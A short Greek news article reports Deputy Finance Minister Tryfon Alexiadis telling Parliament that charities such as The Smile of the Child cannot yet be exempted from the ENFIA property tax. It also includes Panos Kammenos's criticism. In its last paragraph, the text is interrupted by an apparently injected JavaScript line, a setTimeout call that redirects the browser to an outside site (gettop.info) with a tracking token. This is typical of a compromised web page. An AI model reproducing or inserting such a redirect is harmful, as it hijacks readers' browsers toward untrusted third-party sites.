Αλεξιάδης: Μακάρι να μπορούσαμε να απαλλάξουμε τα ιδρύματα από τον ΕΝΦΙΑ

0
8

 

Μιλώντας στη Βουλή,  ο αναπληρωτής υπουργός Οικονομικών, Τρύφων Αλεξιάδης σημείωσε πως «δεν υπάρχει αυτή τη στιγμή δυνατότητα απαλλαγής του Χαμόγελου του Παιδιού από τον ΕΝΦΙΑ ούτε κι ανάλογων φιλανθρωπικών ιδρυμάτων».

Σύμφωνα με τον αναπληρωτή υπουργό Οικονομικών, η απαλλαγή του «Χαμόγελου» προσκρούει μεταξύ άλλων στην έλλειψη λίστας που να διαχωρίζει τα αμιγώς φιλανθρωπικά ιδρύματα από τα γενικά Νομικά Πρόσωπα μη κερδοσκοπικού χαρακτήρα.

Ο ίδιος υποστήριξε ότι με τη βοήθεια της αναπληρώτριας υπουργού Εργασίας, Θεανώς Φωτίου, επιχειρείται τώρα να γίνει καταγραφή και πιστοποίηση των φιλανθρωπικών ιδρυμάτων όπως το Χαμόγελο του Παιδιού, ώστε να βρουν έναν τρόπο επίλυσης του προβλήματος, που έχει δημιουργηθεί.

Να είστε σίγουροι ότι θα εξαντλήσουμε κάθε δυνατότητα, γιατί γνωρίζουμε το σημαντικό έργο αυτών των ιδρυμάτων αλλά και το οικονομικό πλαίσιο που κινούμαστε.

«Μακάρι να μπορούσαμε να απαλλάξουμε αυτά τα ιδρύματα. Είμαστε αναγκασμένοι να εφαρμόσουμε αυτές τις ρυθμίσεις και προσπαθούμε να το κάνουμε όσο πιο δίκαια» σημείωσε.

Ξεκαθάρισε ότι ΕΝΦΙΑ πληρώνουν τα εν λόγω ιδρύματα μόνο για τα ακίνητα που μισθώνουν κι έχουν έσοδα από αυτά κι όχι για όσα χρησιμοποιούν για τον σκοπό τους και την κάλυψη των αναγκών τους.

«Δεν υλοποιήθηκε η υπόσχεση για νομοθετική πρωτοβουλία για απαλλαγή φόρων από οργανώσεις όπως το Χαμόγελο του Παιδιού» είπε ο Πάνος Καμμένος.

Όπως ανέφερε μέχρι σήμερα το «Χαμόγελο του Παιδιού» ήταν απόλυτα συνεπές και παραδέχθηκε πως το κράτος αν και ήταν υποχρέωσή του δεν στάθηκε στο πλευρό αυτών των παιδιών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here